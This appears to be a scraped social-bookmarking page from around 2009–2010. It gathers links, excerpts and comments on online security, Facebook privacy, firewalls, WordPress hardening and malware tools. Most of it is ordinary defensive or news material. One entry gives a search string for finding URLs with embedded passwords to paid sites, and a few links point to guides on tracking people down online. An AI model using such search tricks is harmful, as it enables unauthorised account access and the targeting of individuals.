Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London. By Matthew Weaver and Vikram Dodd, guardian.co.uk, Thursday 16 April 2009 12.53 BST
Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London
Jenny Jones, a member of the Metropolitan Police Authority and a Green party member of the London assembly, said she would raise the incident with the Met chief, Sir Paul Stephenson, as part of discussions on the policing of the G20 protests. "This is another example of the police completely overreaching the anti-terrorism powers," she said. "They are using it in a totally inappropriate way. "I will be raising it with the commissioner. I have already written to him about the police taking away cameras and stopping people taking photographs and made the point that if it was not for people taking photos, we would not know about the death of Ian Tomlinson or the woman who was hit by a police officer." More out of control policing.
"Austrian tourist who photographed bus and Tube stations says 'nasty incident' has put him off returning to London." Sigh.
To prevent tourism?
rocket.ly - Blog - Top Ten Reasons You Should Quit Facebook
http://www.rocket.ly/home/2010/4/26/top-ten-reasons-you-should-quit-facebook.html
Go to Number 3 for how to delete your FB account
9 things I learned from almost losing my MacBook Air
http://www.tuaw.com/2009/06/05/9-things-i-learned-from-almost-losing-my-macbook-air/
Mac backups, insurance and recovery software.
Never Installed a Firewall on Ubuntu? Try Firestarter - The Community's Center for Security
http://www.linuxsecurity.com/content/view/142641?rdf
Firestarter is a friendly graphical interface that allows you to configure a software firewall in Linux using the built-in IPtables/IPchains utilities. It is an open source GUI firewall program. The software aims to combine ease of use with powerful features, therefore serving both Linux desktop users and system administrators.
firewall
Web Application Exploits and Defenses
http://jarlsberg.appspot.com/
"This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you'll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you'll learn the following"
How-To Permanently Delete Your Facebook Account
http://www.groovypost.com/howto/security/permanently-delete-your-facebook-profile-account/
this seems a lot harder than it should be.
10 Reasons To Delete Your Facebook Account
http://www.businessinsider.com/10-reasons-to-delete-your-facebook-account-2010-5
(Jokinen Juuso, group 23) Dan Yoder gives 10 reasons why you should delete your own Facebook account. The reasons are largely the same ones the press in Finland has also flashed from time to time: privacy, Mark Zuckerberg's history as a password thief, and others. I chose this topic because it is current. Facebook gets criticized from time to time in almost every media outlet, even within Facebook itself. I don't fear for my own privacy in any way other than that someone else publishes a picture in which I'm not at my best, and not being on Facebook wouldn't stop anyone from doing that. When I'm on Facebook I can keep an eye on the content visible about me there. The text also criticizes Facebook for selling my information to advertising agencies. On the other hand, advertising agencies use my information to get the best possible ads for me. I'd rather see ads that interest me at the edge of my FB pages than, for example, ads for old women's underwear.
I'm really close...
I'm rocking #facebook but if you are unsure, read this -> http://ow.ly/1HhST and then to delete your account go here -> http://ow.ly/1HhTW
HOW TO: Secure Your WordPress Blog
http://mashable.com/2010/04/28/wordpress-security-tips/
Here are some of our tips for keeping your WordPress website or blog more secure and less susceptible to malicious attacks.
Facebook's Eroding Privacy Policy: A Timeline | Electronic Frontier Foundation
http://w2.eff.org/deeplinks/2010/04/facebook-timeline/
Facebook is a dangerous place to have a profile on - not because of maurading online predators, but because you don't know where you stand with it as a company. This research from the EFF proves that they are happy to re-jig their privacy rules in order make money from their users.
DroneBL Blog: Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks
http://dronebl.org/blog/8
psyb0t
@AlohaArleen Could it be the current worm? http://is.gd/otVx [from http://twitter.com/dc0de/statuses/1373557182]
You are only vulnerable if: * Your device is a mipsel (MIPS running in little-endian mode, this is what the worm is compiled for) device. * Your device also has telnet, SSH or web-based interfaces available to the WAN, and * Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable. As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots.
Six Things You Need to Know About Facebook Connections | Electronic Frontier Foundation
http://www.eff.org/deeplinks/2010/05/things-you-need-know-about-facebook
Facebook is moving people to their new 'Connections'. And it appears that your privacy settings have been dumped in the process.
This #Facebook lack of #privacy stuff is REALLY concerning me http://bit.ly/9nnk4j
Facebook's creepy new privacy settings
Zend_Acl part 3: creating and storing dynamic ACLs | CodeUtopia
http://codeutopia.net/blog/2009/02/18/zend_acl-part-3-creating-and-storing-dynamic-acls/
In this third post of the series, I’ll talk about using dynamic ACLs: How to store an ACL in a database, and construct it from there when needed. This post builds on the things introduced in part 1 and part 2.
"AnalogX AnonyMAC", free software that lets you change your MAC address at will - GIGAZINE
http://gigazine.net/index.php?/news/comments/20090602_analogx_anonymac/
Change your MAC address at will
10 Tips to Keep Your Notebook Safe when Traveling ~ Chris Pirillo
http://chris.pirillo.com/2008/10/23/10-tips-to-keep-your-notebook-safe-when-traveling/
If you must bring a laptop ...
These days, we Geeks don’t travel anywhere without our laptops . It’s a given that we need to have them on us! How would we survive?! Thankfully, Seth sent in the following tips to help us keep them safe while we are on the road.
What’s the password…haddock?
http://stephencelis.com/2009/03/29/whats-the-password-haddock.html
% ha-gen -f ~/Documents/awesome_words.txt
Friendly password generator. There are other alternatives such as flapcore.
Password generator that attempts to use words that are more memorable.
tempalias - Temporary Email Aliases
http://tempalias.com/#/
closedcrkt@gmail.com After 2 days have passed, this alias will be
Home
http://qubes-os.org/Home.html
Qubes is an open source operating system designed to provide strong security for desktop computing. Qubes is based on Xen, X Window System, and Linux, and can run most Linux applications and utilize most of the Linux drivers. In the future it might also run Windows apps.
crazy, run each app on the desktop in its own VM, isolate the networking stack in a VM, etc.
An entirely different approach to security: isolate. A lot. Not sure if this will completely work against common exploits
The technical basis is provided by existing open-source projects such as Xen, Linux and the X Window System, which Joanna Rutkowska and her colleague Rafal Wojtczuk have equipped with, among other things, a secure graphical interface. It is also intended to allow copy and paste between the VMs.
7-things-to-stop-doing-now-on-facebook: Personal Finance News from Yahoo! Finance
http://finance.yahoo.com/family-home/article/109538/7-things-to-stop-doing-now-on-facebook
To do with privacy. Read.
The Easy, Any-Browser, Any-OS Password Solution - Security - Lifehacker
http://lifehacker.com/5483119/the-easy-any+browser-any+os-password-solution
LastPass info from Lifehacker
How to Quit Facebook Without Actually Quitting Facebook - Facebook - Lifehacker
http://lifehacker.com/5538697/how-to-quit-facebook-without-actually-quitting-facebook
With all the privacy issues surrounding Facebook, many people are considering quitting the site altogether. If you're not ready to take it that far, here's how to avoid the privacy breaches without completely deleting your account and losing touch with your friends.
Theirtoys.com Blog: The Ultimate Porn Surfers Cheat Sheet
http://sexblog.theirtoys.com/2008/12/ultimate-porn-surfers-cheat-sheet.html
how to be Google.
"http:*:password@www" bangbus
apophenia » Blog Archive » Facebook and “radical transparency” (a rant)
http://www.zephoria.org/thoughts/archives/2010/05/14/facebook-and-radical-transparency-a-rant.html
Zuckerberg and gang may think that they know what’s best for society, for individuals, but I violently disagree. I think that they know what’s best for the privileged class. And I’m terrified of the consequences that these moves are having for those who don’t live in a lap of luxury.
Interesting insight from female scholar
Must read: Facebook and “radical transparency” (a rant) by researcher Danah Boyd http://j.mp/9EjHul – Jean-Luc Raymond (jeanlucr) http://twitter.com/jeanlucr/statuses/14000875802
ReclaimPrivacy.org | Facebook Privacy Scanner
http://www.reclaimprivacy.org/
Privacy scanner for FB
This website provides an independent and open tool for scanning your Facebook privacy settings.
Facebook Privacy Scanner http://www.reclaimprivacy.org/
http://www.reclaimprivacy.org/ Facebook privacy scanner online! Check your Facebook settings! – Samir Allioui (SamirAllioui) http://twitter.com/SamirAllioui/statuses/14174960709
Schneier on Security: Here Comes Everybody Review
http://www.schneier.com/blog/archives/2008/11/here_comes_ever.html
brilliant review (and comments) on Shirky's "Here Comes Everybody"
"Coase, who won the 1991 Nobel Prize in Economics, answered the question by noting a market's transaction costs: buyers and sellers need to find one another, then reach agreement, and so on. The Coase theorem implies that if these transaction costs are low enough, direct markets of individuals make a whole lot of sense. But if they are too high, it makes more sense to get the job done by an organization that hires people. What's new is something consultant and social technologist Clay Shirky calls "Coase's Floor," below which we find projects and activities that aren't worth their organizational costs -- things so esoteric, so frivolous, so nonsensical, or just so thoroughly unimportant that no organization, large or small, would ever bother with them. Things that you shake your head at when you see them and think, "That's ridiculous." Sounds a lot like the Internet, doesn't it?"
Review of Clay Shirky's book, with useful new insights in the first couple of paragraphs.
In 1937, Ronald Coase answered one of the most perplexing questions in economics: if markets are so great, why do organizations exist? Why don't people just buy and sell their own services in a market instead? Coase, who won the 1991 Nobel Prize in Economics, answered the question by noting a market's transaction costs: buyers and sellers need to find one another, then reach agreement, and so on. The Coase theorem implies that if these transaction costs are low enough, direct markets of individuals make a whole lot of sense. But if they are too high, it makes more sense to get the job done by an organization that hires people.
"[Clay Shirky's] new book, Here Comes Everybody: The Power of Organizing Without Organizations, explores a world where organizational costs are close to zero and where ad hoc, loosely connected groups of unpaid amateurs can create an encyclopedia larger than the Britannica and a computer operating system to challenge Microsoft's."
Army Orders Bases to Stop Blocking Twitter, Facebook, Flickr | Danger Room | Wired.com
http://www.wired.com/dangerroom/2009/06/army-orders-bases-stop-blocking-twitter-facebook-flickr/
RT @chrisguillebeau: Wired: Army Orders Bases to Stop Blocking Twitter, Facebook, and other social networking sites - http://bit.ly/y9kle [from http://twitter.com/gvillearchitect/statuses/2112505130]
Army unblocks social media tools
"...a click in the right direction for the armed service which seems to be making a slow but steady recovery from its lingering hostility towards social media."
The Army has ordered its network managers to give soldiers access to social media sites like Facebook, Flickr, and Twitter, Danger Room has learned. That move reverses a years-long trend of blocking the web 2.0 locales on military networks. Army public affairs managers have worked hard to share the service’s stories through social sites like Flickr, Delicious and Vimeo. Links to those sites featured prominently on the Army.mil homepage. The Army carefully nurtured a Facebook group tens of thousands strong, and posted more than 4,100 photos to a Flickr account. Yet the people presumably most interested in these sites — the troops — were prevented from seeing the material. Many Army bases banned access to the social networks.
Recover Data Like a Forensics Expert Using an Ubuntu Live CD - How-To Geek
http://www.howtogeek.com/howto/15761/recover-data-like-a-forensics-expert-using-an-ubuntu-live-cd/
Recover Data Like a Forensics Expert Using an Ubuntu Live CD
You’re Leaving a Digital Trail. What About Privacy? - NYTimes.com
http://www.nytimes.com/2008/11/30/business/30privacy.html
An emerging field called collective intelligence could create an Orwellian future on a level Big Brother could only dream of.
The success of Google, along with the rapid spread of the wireless Internet and sensors — like location trackers in cellphones and GPS units in cars — has touched off a race to cash in on collective intelligence technologies.
collective intelligence
“The new information tools symbolized by the Internet are radically changing the possibility of how we can organize large-scale human efforts,” said Thomas W. Malone, director of the M.I.T. Center for Collective Intelligence. “For most of human history, people have lived in small tribes where everything they did was known by everyone they knew,” Dr. Malone said. “In some sense we’re becoming a global village. Privacy may turn out to have become an anomaly.”
Downloads: KidsMenu is a Kid-Friendly Interface for Windows
http://lifehacker.com/5163394/kidsmenu-is-a-kid+friendly-interface-for-windows
Featured Windows Download: SoftPerfect Scans Networks from a USB Drive
http://lifehacker.com/5067971/softperfect-scans-networks-from-a-usb-drive
network findings in an easy-to-grasp manner, and can be expanded to show you more than just names and addresses. Weighing in at less than 1MB, it makes a great addition to any thumb drive, especially for anyone often called upon to figure out what's up with the router. Check out some of SoftPerfect's deeper options and offerings below. After grabbing and installing the stand-alone executable, you'll see that SoftPerfect can do some pretty basic system-finding and exploration. Head to "Options" and choose "Auto Detect Local IP Range" to save yourself the typing. On most home networks, if you're prompted for an interface choice, pick the one that starts with 192.168. Hit "Start scanning," and you're off. If SoftPerfect finds a shared folder, you can right-click it to open Windows' native explorer view or map it to a virtual letter drive. Right-clicking a computer icon offers you wake-on-LAN sleep/wake-up options, along with HTTP, FTP, and Telnet connection. Where are the MAC addresses,
Google Abandons Standards, Forks OpenID — The NeoSmart Files
http://neosmart.net/blog/2008/google-doesnt-use-openid/
Google Abandons Standards, Forks OpenID http://ow.ly/1NncJ
well they're not Microsoft but well on their way
Connecting Ideas
OpenID
10 iptables rules to help secure your Linux box | 10 Things | TechRepublic.com
http://blogs.techrepublic.com.com/10things/?p=539
allow you to actually work normally on your desktop. All network traffic going out of your machine will be allowed out, but all TCP/IP traffic coming into your m
Mastering iptables could take a while, but if you have a few rules to cover the basic security needs, you’ll be well on your way to protecting your Linux system. Jack Wallen explains some key rules to get you started.
Palin E-Mail Hacker Says It Was Easy | Threat Level from Wired.com
http://blog.wired.com/27bstroke6/2008/09/palin-e-mail-ha.html
Palin E-Mail Hacker Says It Was Easy
Email hacking is taken too far.
Palin's e-mail was hacked into not with expert knowledge of computer systems, but rather a well thought out trick to recover her account password. This just goes to show information is power. People can find personal information on many other people in the world. If this information gets into the wrong hands, there are ways it may be used against you.
"hacker" said it was easy. Haha.
5 Essential Facebook Privacy Tips
http://mashable.com/2010/05/18/facebook-privacy-tips/
Choosing an SSL certificate suited to mobile support and load-balanced environments: Goodpic
http://www.goodpic.com/mt/archives2/2008/10/ssl.html
If Japanese-language support is required, SECOM may be the better choice when you have many servers, and GeoTrust when mobile support matters most.
Top 10 Privacy Tweaks You Should Know About
http://lifehacker.com/5544200/top-10-privacy-tweaks-you-should-know-about
With all the talk lately about Facebook's flawed privacy systems, it's a good time to consider what you're making available elsewhere on the web and on your system. These 10 settings tweaks and setups make your web life a little less public.
Beware of the hidden traces of adult sites that clearing your history won't remove - てっく煮ブログ
http://d.hatena.ne.jp/nitoyon/20090519/histroy_lso
Normally a browser has a "clear history" function, and it seems as if clearing the browser history would make all your misdeeds disappear. However, there is history left behind that cannot be cleared from the browser...
Flash Local Shared Objects (something like cookies) are saved under "~/Library/Preferences/Macromedia/Flash Player/#SharedObjects/<random hash>/", so a record of the sites you visited is left behind.
Being smart about Web mail | Defensive Computing - CNET News
http://news.cnet.com/8301-13554_3-10061939-33.html
There was an interesting article recently in The New York Times about getting locked out of a Gmail account. In August, blogger Alan Shimel of StillSecure wrote about his problems regaining access to a Yahoo e-mail account. Suffice it to say that if someone learns your Web mail password, it's a very difficult situation--one that may not end well. For one thing, the Web mail provider may not know enough about you to determine the true account owner. Worse still, anyone using a free Web mail account from Google (Gmail), Yahoo, or Microsoft (Hotmail) can't expect to talk to a human being to resolve a problem with their account. Talking to a person at Google requires a subscription to Google Apps Premier Edition for $50 a year. Microsoft and Yahoo similarly offer telephone support only to "premium" customers. If you care about a Web mail account, then some homework may be in order. Alternate e-mail address One thing Web mail users should have associated with their account is an alternat
Blaine WA Real Estate Listings - One of a kind house for sale
http://www.oneofakindhouse.com/fortress.html
The Fortress. The Underground Fortress is an 8th wonder of the world! It is an unbelievable feat of engineering. The Fortress goes a total of 45 feet under the house! That is below sea level! The fortress has over 1600 sq. ft. of living area, plus hundreds of more square feet of passages and secrets rooms. It was all hand dug over a 20 year period, and all the walls were constructed with a small electric hand cement mixer. There are 3 ft concrete walls, using 5-bag cement (20% denser than regular cement). Not only are the walls thick and dense, but the finishing work is amazing quality. These walls keep it a constant 60F degrees year round. It is so well insulated that even one small space heater can heat all 1600+ sqft of fortress space in a few hours. The fortress has amazingly fresh air in it with an incredible air ventilation system that pulls air outside and brings fresh air in, leaving no moldy or musty smell that you commonly smell in basements.
Everything having
"The Underground Fortress is an 8th wonder of the world! It is an unbelievable feat of engineering. The Fortress goes a total of 45 feet under the house! That is below sea level! The fortress has over 1600 sq. ft. of living area, plus hundreds of more square feet of passages and secrets rooms. It was all hand dug over a 20 year period, and all the walls were constructed with a small electric hand cement mixer." Full of survival gear, nitrogen-sealed food supplies, etc.
Android but not Paranoid: Dynamically generating and executing x86 code
http://androidbutnotparanoid.blogspot.com/2009/05/dynamically-generating-and-executing.html
<GeDaMo> Use mmap rather than malloc if you want memory with nx disabled: http://androidbutnotparanoid.blogspot.com/2009/05/dynamically-generating-and-executing.html
Computer programs can generate machine code in memory and then execute it. This is the case with Sun's Java Hotspot VM, which dynamically compiles Java bytecode to native code to increase the VM's performance. Several exploits are based on buffer overflows to remotely inject machine code into memory and then jump into it. Google released its Chrome web browser featuring the V8 Javascript Engine, which greatly improved Javascript's performance by compiling Javascript to native code.
Virtual Keyboard Interface for Greasemonkey
http://userscripts.org/scripts/show/10974
Adds a virtual keyboard to text fields, password fields and textareas allowing keyboardless input of text and special characters. Install the script and double-click on one of the form element types above to display the keyboard.
to get around keylogging, keyloggers
Trick.ly
http://trick.ly/
url shortener
Awesome new URL shortener, http://www.trick.ly/ allows you to set a password question to gain access to the long URL, perfect for fact tests
How to make URLs short and password protected
AppLocker
http://www.smart-x.com/?CategoryID=216&ArticleID=162
Features: * Secure and enhance performance to your Terminal Server and workstations by preventing execution of chosen applications. * Prevent access to any application by executable filename. * Freeware!
page
Blocks Windows applications
Instantly and easily lock access to applications in any environment - Free utility to block the execution of applications
There are some programs that, however much we want to, we cannot uninstall (did someone at the back say Internet Explorer?). We can, however, do everything possible to ignore their existence. One such measure is to block their execution, so that they neither open accidentally nor through an association with a particular file type. To do this easily we have programs like Application Locker, a free application for Windows. The program comes with a predefined list of programs to block (which is why you may see some you don't have installed), but you can also add your own. Besides keeping the ones you don't want from running, you can use this tool to, for example, stop the kids from using Firefox or MSN, or keep them out of reach during working hours (a little help with self-discipline).
Could your social networks spill your secrets? - Short Sharp Science - New Scientist
http://www.newscientist.com/blogs/shortsharpscience/2009/01/what-your-social-network-can-r.html
The Google team's paper (Under)mining privacy in social networks (pdf) will be presented at the Web 2.0 Security and Privacy 2009 meeting in May. Tom Simonite, online technology editor
FOXNews.com - Hackers Crack Into Texas Road Sign, Warn of Zombies Ahead - Science News | Science & Technology | Technology News
http://www.foxnews.com/story/0,2933,484326,00.html
One of my all time favourite hacks... this has become such an iconic figure
if not for our future career aspirations, this is totally something we would try.
I love dork humor.
This is funny. Now it won't happen again. Pity. Sorry for the news source, I know they aren't the best. Hey, it is still a funny article.
Houdini 2.1 - MacUpdate
http://www.macupdate.com/info.php/id/26729
Create, access, or delete hidden folders. Download Houdini for the Mac from MacUpdate.com.
4 Most Important PHP Security Measures | PHP | Server-Side Magazine
http://www.serversidemagazine.com/php/4-most-important-php-security-measures
As recently as a month ago I was a victim of a state of mind I call Analytics Dismissal Disorder. This mindset is common after hearing about the importance of analytics, installing the tracking code and then getting overwhelmed by all of the graphs and scary numbers. When I suffered from analytics dismissal disorder (which my doctors called A.D.D. for short), I knew Google Analytics was important but avoided the extra effort necessary to learn how to get the most out of the software. This post explains what I needed to learn to get over this.
$clean_message = strip_tags($_POST['txtComment']);
Featured Windows Download: Hitman Pro Runs Eight Different Anti-Malware Apps with One Click
http://lifehacker.com/5069944/hitman-pro-runs-eight-different-anti+malware-apps-with-one-click
8!!! different malware/virus apps in one go!!! useful for when the shit hits the fan...
Free application Hitman Pro scans your system for malware using not one, not two, but eight different anti-malware applications. Essentially, Hitman Pro is a helper utility that runs up to eight different cleaning tools when you tell it to.
Windows only: Free application Hitman Pro scans your system for malware using not one, not two, but eight different anti-malware applications. Essentially, Hitman Pro is a helper utility that runs up to eight different cleaning tools when you tell it to. Some are favorites we all know and love, like Ad-Aware and Spybot S&D, while others are a bit more obscure. The idea behind Hitman Pro is that you've got a one-stop shop for killing off any malware that hits your system—regardless of whether it's spyware, adware, or some nasty virus. As the MakeUseOf post points out, scanning your system with each app can be a time-consuming process, so it's best to use when your computer is idle. If Hitman Pro seems like overkill, check out our five best antivirus applications and five best Windows maintenance tools for some great alternatives.
Lego Safe is ultra secure - SlipperyBrick.com
http://www.slipperybrick.com/2008/11/legos-safe/
the cutting edge of Lego safe technology...
Rail Spikes: Testing SSL in Rails
http://railspikes.com/2008/9/12/testing-ssl
def test_get_new_with_http_should_redirect_to_ssl
  @request.env['HTTPS'] = nil
  get :new
  assert_redirected_to "https://" + @request.host + @request.request_uri
end
@request.env['HTTPS'] = 'on'
Here’s a quick tip for how to test that your application is using SSL correctly.
Chrome antics: did Google reverse-engineer Windows?: Page 1
http://arstechnica.com/articles/paedia/chrome-antics-did-google-reverse-engineer.ars
Chrome process model
pending sect. 2 & 3
Featured Windows Download: WinPT Portable Encrypts and Unlocks Your USB Drive Data
http://lifehacker.com/5128024/winpt-portable-encrypts-and-unlocks-your-usb-drive-data
Blurred Out: 51 Things You Aren't Allowed to See on Google Maps | Curious? Read
http://www.curiousread.com/2008/12/blurred-out-51-things-you-arent-allowed.html
An interesting list of things that cannot be seen on Google Maps.
If terrorists were looking for potential targets, they now have a nice list...
.htaccess What, Why, When and How | KomunitasWeb
http://komunitasweb.com/2009/03/htaccess-what-why-when-and-how/
AddOutputFilterByType DEFLATE text/html text/plain text/xml
.htaccess is a file with the power to override certain configurations in the Apache httpd.conf file. If you're using shared hosting, then you don't have access to the Apache main configuration. So most shared hosting will provide you with a .htaccess file.
RT @cameronolivier: The What, Why, When & How of .htaccess http://bit.ly/xJLWO [from http://twitter.com/bkuri/statuses/1370101751]
窓の杜 - [REVIEW] Lists "svchost.exe" and the services it manages: "Svchost Process Analyzer"
http://www.forest.impress.co.jp/article/2009/06/01/svchostanalyzer.html
The Straight Dope: How would I go about laundering money?
http://www.straightdope.com/columns/read/2836/how-would-i-go-about-laundering-money
Stanford Javascript Crypto Library
http://bitwiseshiftleft.github.com/sjcl/
A New Type of Phishing Attack « Aza on Design
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
@caryblack Makes me paranoid. http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
Tabnabbing: A New Type of Phishing Attack - via @dustice http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
What Settings Should I Change on My Wi-Fi Router?
http://lifehacker.com/5553789/what-settings-should-i-change-on-my-wi+fi-router
Good general guidelines for wireless router setup.
Dear Lifehacker, I just moved into my first apartment, and bought my first Wi-Fi router. It's a standard Linksys "blue box," and seems to work fine, but I'm wondering: are there any settings I should be looking to change?
How to Track Down Anyone Online
http://lifehacker.com/329033/how-to-track-down-anyone-online
How To Permanently Delete Your Account on Popular Websites - Smashing Magazine
http://www.smashingmagazine.com/2010/06/11/how-to-permanently-delete-your-account-on-popular-websites/
How difficult is it to delete your social networking account? In some cases very, and in others impossible.
[...] we’ll take a look at the account deletion processes of popular websites and services, and how easy or difficult they make it. Then we’ll discuss why sites make things so complicated, and some things to consider when designing your own deletion policies.
It may be useful one day, who knows?
http://www.profilewatch.org/
on Facebook
Tool to find out the privacy level of your Facebook account
Service to evaluate the privacy of your information on Facebook
Check your Facebook privacy
Facebook Further Reduces Your Control Over Personal Information | Electronic Frontier Foundation
http://www.eff.org/deeplinks/2010/04/facebook-further-reduces-control-over-personal-information
The issue with Facebook's latest change is not that they force you to link your interests without permission, but rather that they remove an option to express yourself on the profile without links. As we noted, Facebook users now face a Hobson's choice between the new Connections and no listed interests at all. As Facebook explains, "If you didn't connect to any of the suggestions, the sections of your profile to which those suggestions corresponded will now be empty." (The transition tool also allows you to delay the choice by saying 'Ask Me Later'). Previously, you could list interests in your profile without linking; after the transition, you cannot. You do have options to adjust visibility on the profile page, for which we commend Facebook, but nevertheless, this is not a true opt-out because all the "Facebook Pages you connect to are public."
An ordinary human is not going to look through the list of Facebook's millions of cooking fans. It's far too large. Only data miners and targeted advertisers have the time and inclination to delve that deeply.
"Once upon a time, Facebook could be used simply to share your interests and information with a select small community of your own choosing. As Facebook's privacy policy once promised, "No personal information that you submit to Facebook will be available to any user of the Web Site who does not belong to at least one of the groups specified by you in your privacy settings.""
A rough walkthrough of what is inside the OAuth protocol - ゆろよろ日記
http://d.hatena.ne.jp/yuroyoro/20100506/1273137673
Protect Your Privacy Opt Out of Facebook’s New Instant Personalization – Yes You Have to Opt Out | Librarian by Day
http://librarianbyday.net/2010/04/protect-your-privacy-opt-out-of-facebooks-new-instant-personalization-yes-you-have-to-opt-out/
OK right @librarianbyday link: RT @mikebutcher: Outside sites "Instant personalisation" via Facebook is opt out, not in http://bit.ly/cWleqW – Nicola Osborne (suchprettyeyes) http://twitter.com/suchprettyeyes/statuses/12668465502
FT.com / Technology - Google ditches Windows on security concerns
http://www.ft.com/cms/s/2/d2f3f04e-6ccf-11df-91c8-00144feab49a.html
"Google is phasing out the internal use of Microsoft’s ubiquitous Windows operating system because of security concerns, according to several Google employees."
The problem is two-fold: technology and person. Switching to a more secure operating system doesn't fully shield you from some idiot clicking on a URL from an IM chat.
Google is phasing out the internal use of Microsoft’s ubiquitous Windows operating system because of security concerns, according to several Google employees. The directive to move to other operating systems began in earnest in January, after Google’s Chinese operations were hacked, and could effectively end the use of Windows at Google, which employs more than 10,000 workers internationally.
Internal directive follows China hacking
Quote: Employees said it was also an effort to run the company on Google's own products, including its forthcoming Chrome OS, which will compete with Windows. "A lot of it is an effort to run things on Google product," the employee said. "They want to run things on Chrome." The hacking in China hastened the move.
Cross-domain Ajax with Cross-Origin Resource Sharing | NCZOnline
http://www.nczonline.net/blog/2010/05/25/cross-domain-ajax-with-cross-origin-resource-sharing/
Avoiding proxy use for cross-domain ajax request, easier than you thought.
A couple of years ago, web developers were banging their head against the first wall in Ajax: the same-origin policy. While we marveled at the giant step
Set Up a Foolproof and Fireproof Automatic Backup Plan
http://lifehacker.com/5564957/set-up-a-foolproof-and-fireproof-automatic-backup-plan
Fight with Spam: 15+ Free Captcha Solutions
http://www.1stwebdesigner.com/resources/captcha-solutions-kill-spam/
A 'Captcha' is a challenge-response test most often placed within web forms to determine whether the user is human or a spam bot.
What’s the Difference Between Viruses, Trojans, Worms, and Other Malware?
http://lifehacker.com/5560443/whats-the-difference-between-viruses-trojans-worms-and-other-malware
Do you know the difference between malware, viruses, trojans and worms? The explanation: http://j.mp/amsdhQ – Sergej Müller (wpSEO) http://twitter.com/wpSEO/statuses/16762701185
How to Set Up OpenID on Your Own Domain
http://lifehacker.com/5566470/how-to-set-up-openid-on-your-own-domain
2 lines of HTML code make your domain map to an openid provider... meaning you can type $DOMAIN_NAME into an openid space and not (gmail|yahoo|etc)
OpenID is an open standard for logging onto various web services with a single digital identity. The tool puts your online identity back in your hands, and as it turns out, OpenID on your own domain is surprisingly easy.
lifehacker.com: Setting up OpenID thru your own domain
Top 15 Wordpress Plugins to Make Your Blog Secure | AEXT.NET MAGAZINE
http://aext.net/2010/05/wordpress-security-plugins/
How to Find the Person behind an Email Address - Reverse Email Search
http://www.labnol.org/internet/find-person-by-email-address/13913/
Find the Person Behind an Email Address
Reverse Email Search
Accessible Text CAPTCHAs: 157,500,799 logic questions
http://textcaptcha.com/
Away with image captchas http://textcaptcha.com/ #accessibility #textcaptcha
"This site provides a web service to generate text-based CAPTCHAs, based on simple logic questions."
Text Captcha is an accessible alternative to standard captcha methods and relies on logic.
How To Put Facebook On A Privacy Lockdown
http://www.businessinsider.com/how-to-lock-down-your-facebook-profile-2010-5
If you're going to use Facebook, you should definitely know how to keep your information private.
But if you're going to use Facebook, you should definitely know how to keep your information private.
Worried about Facebook privacy but still want to keep your account? A visual guide to how to lock it down. http://bit.ly/aHcihN
You'll never quit. So protect yourself.
How To Set Your Privacy settings in Facebook - FB really, really made it hard to impossible.... ¦ http://bit.ly/bARi1x
JavaScript Blacklist
http://homepage.mac.com/drewthaler/jsblacklist/
JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily. Examples of idiotic stuff you might want to block:
* tynt.com - modifies copy-pasted text
* intellitxt.com - green links with double-underlines
* snap.com - link previews
"JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily." Better version of the tynt-blocker extension I linked to before.
JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from a configurable list of domains. If a common "utility" script used by sites that you visit is annoying you, this will let you opt out quickly and easily. Here are some examples of common annoying scripts. JavaScript Blacklist comes pre-configured to block these by default.
* tynt.com - modifies copy-pasted text
* intellitxt.com - green links with double-underlines
* snap.com - link previews
Allows you to turn off annoying scripts.
Safari JavaScript Blacklist - JavaScript Blacklist is a simple extension for Safari 5 which blacklists scripts from ... http://ow.ly/17K9ef – Javascript News (del_javascript) http://twitter.com/del_javascript/statuses/16212314408
Top 45 Wordpress Plugins & Tools For The Administration Area | Design your way
http://www.designyourway.net/blog/resources/top-45-wordpress-plugins-tools-for-the-administration-area/
Top 45 Wordpress Plugins & Tools For The Administration Area | Design your way - http://www.designyourway.net/blog/resources/top-45-wordpress-plugins-tools-for-the-administration-area/
45 top plugins for the WordPress admin area
huge list of useful plugins for WP admins
10 Useful WordPress Security Tweaks - Smashing Magazine
http://www.smashingmagazine.com/2010/07/01/10-useful-wordpress-security-tweaks/
10 Useful WordPress Security Tweaks - Smashing Magazine
Several tips for using .htaccess and plugins to deny malicious scripts, dir browsing, etc.
Security has always been a hot topic. Offline, people buy wired homes, car alarms and gadgets to bring their security to the max. Online, security is important, too, especially for people who make a living from websites and blogs. In this article, we’ll show you some useful tweaks to protect your WordPress-powered blog.
A must-read for web programmers! The fastest way to master the basics of web vulnerabilities - 燈明日記
http://d.hatena.ne.jp/chaichanPaPa/20100509/1273376018
Summarized in the following list...
* Injection
* Cross-site scripting
* Session hijacking
* Missing access control or authorization control
* Directory traversal
* CSRF (cross-site request forgery)
How to Stay Safe on Public Wi-Fi Networks
http://lifehacker.com/5576927/how-to-stay-safe-on-public-wi+fi-networks
Web Application Exploits and Defenses
http://jarlsberg.appspot.com/part1
RT @joacim_boive: Google Code University: Web Application Exploits and Defenses http://bit.ly/hacking_web
Video: Major Facebook security hole lets you view your friends’ live chats
http://eu.techcrunch.com/2010/05/05/video-major-facebook-security-hole-lets-you-view-your-friends-live-chats/
You've got to hand it to Facebook. They certainly know how to do security -- not. Today I was tipped off that there ...
BBC News - First human 'infected with computer virus'
http://news.bbc.co.uk/2/hi/technology/10158517.stm
the first cyborg is now the first infected cyborg. TOI-esque headline on BBC http://news.bbc.co.uk/2/hi/technology/10158517.stm [from http://twitter.com/madguy000/statuses/14764804819]
Whisper Systems
http://www.whispersys.com/
